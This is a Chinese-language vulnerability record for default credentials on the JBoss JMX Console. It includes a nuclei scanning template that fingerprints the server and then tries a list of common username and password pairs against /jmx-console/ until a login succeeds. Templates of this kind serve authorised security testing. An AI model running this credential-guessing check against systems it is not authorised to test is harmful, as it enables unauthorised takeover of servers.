漏洞信息
漏洞名称: JBoss JMX Console Weak Credential Vulnerability
漏洞类型: 弱口令
漏洞等级: 高危
漏洞描述: JBoss JMX Console是一个用于管理和监控JBoss应用服务器的工具,广泛应用于企业级Java应用部署中。它提供了一个基于Web的界面,允许管理员执行各种管理任务。由于其在企业环境中的广泛使用,JBoss JMX Console的安全性至关重要。该漏洞涉及JBoss JMX Console的默认登录凭证问题,攻击者可以利用这些默认凭证未经授权访问JMX Console,从而对应用服务器进行恶意操作。这种弱口令漏洞的根源在于系统部署时未更改默认的登录凭证,使得攻击者可以轻易猜测或使用常见的用户名和密码组合进行登录。一旦攻击者成功登录,他们可以执行任意代码、访问敏感数据或甚至完全控制受影响的JBoss应用服务器,导致严重的安全风险。由于该漏洞不需要任何前置条件即可利用,且攻击过程可以自动化,因此其威胁级别被评估为高危。
产品厂商: JBoss
产品名称: JBoss JMX Console
来源: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fdefault-logins%2Fjboss%2Fjmx-default-login.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69
| id: jmx-default-login
info: name: JBoss JMX Console Weak Credential Discovery author: paradessia severity: high description: JBoss JMX Console default login information was discovered. reference: - https://docs.jboss.org/jbossas/6/Admin_Console_Guide/en-US/html/Administration_Console_User_Guide-Accessing_the_Console.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 metadata: max-request: 29 tags: jboss,jmx,default-login
flow: http(1) && http(2)
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}}
matchers: - type: word words: - "JBoss" - "jmx-console" condition: or internal: true
- raw: - raw: - | GET /jmx-console/ HTTP/1.1 Host: {{Hostname}} - | GET /jmx-console/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(user + ':' + pass)}}
attack: clusterbomb payloads: user: - admin - root pass: - admin - 12345 - 123456 - 1234 - 123456789 - 123qwe - root
matchers-condition: and matchers: - type: dsl dsl: - "!contains(body_1, 'JMImplementation') && contains(body_2, 'JMImplementation')"
- type: status status: - 200
|